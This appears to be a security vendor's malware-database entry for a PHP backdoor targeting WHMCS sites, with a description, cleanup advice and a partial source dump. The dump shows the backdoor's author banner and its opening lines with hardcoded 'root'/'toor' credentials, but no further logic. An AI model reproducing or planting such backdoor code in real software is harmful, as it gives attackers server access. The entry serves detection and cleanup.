PRICING SUPPORT LOGIN

Backdoors are server-side malicious scripts which are intended to perpetrate malicious acccess to the server. The typical example of such backdoors are various File Managers, Web Shells, tools for bypassing admin login or various one-purpose scripts allowing the attacker to upload and run another type of malicious scripts. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as Web Shell environment) is visible in the browser, not the malicious code itself. It's very common, that backdoors don't have any visible signs in the site code and it's impossible to detect them by accessing the infected site from outside. Server level analysis is necessary in case of infection by this type of malware.
This backdoor provides the attacker full access to the WHCMS infrastructure throught its interface.

Affecting

Any WHCMS based web site (often through outdated WordPress, Joomla, osCommerce, Magento, Drupal and stolen passwords).

Cleanup

Cleanup is done by deleting the malicious code from the file, or replacing it with a fresh version. Reviewing access logs for non-expected HTTP POSTs can point out the possible infected files.

Dump

<?
/*

__ ___ _ __ __ _____ _____ _ ___ _ _
\ \ / / | | | \/ |/ ____|/ ____| | |/ (_) | |
\ \ /\ / /| |__| | \ / | | | (___ | ' / _| | | ___ _ __
\ \/ \/ / | __ | |\/| | | \___ \ | < | | | |/ _ \ '__|
\ /\ / | | | | | | | |____ ____) | | . \| | | | __/ |
\/ \/ |_| |_|_| |_|\_____|_____/ |_|\_\_|_|_|\___|_|


888 888 888
888 888 888
888 888 888
.d8888b .d88b. .d88888 .d88b. .d88888 88888b. 888 888
d88P" d88""88b d88" 888 d8P Y8b d88" 888 888 "88b 888 888
888 888 888 888 888 88888888 888 888 888 888 888 888
Y88b. Y88..88P Y88b 888 Y8b. Y88b 888 888 d88P Y88b 888
"Y8888P "Y88P" "Y88888 "Y8888 "Y88888 88888P" "Y88888
888
Y8b d88P
"Y88P"

.______ ___ .______ ____ ______ __ __ .__ __.
| _ \ / \ | _ \ |___ \ / __ \ | | | | | \ | |
| |_) | / ^ \ | |_) | __) | | | | | | | | | | \| |
| / / /_\ \ | _ < |__ < | | | | | | | | | . ` |
| |\ \----./ _____ \ | |_) | ___) | | `--' | | `--' | | |\ |
| _| `._____/__/ \__\ |______/ |____/ \______/ \______/ |__| \__|


mail : v.b-4@hotmail.com

Greets:
RENO ; az7rb ; ENG SILENT NIGHT And All P0c TEAM
The Injector ; Sec4ever ; Lagripe-Dz ; ApOcalYpse ; RaYm0n ; And All Sec4ever TEAM

*/
ob_start();
$auth =1;

$name='root';
$pass='toor';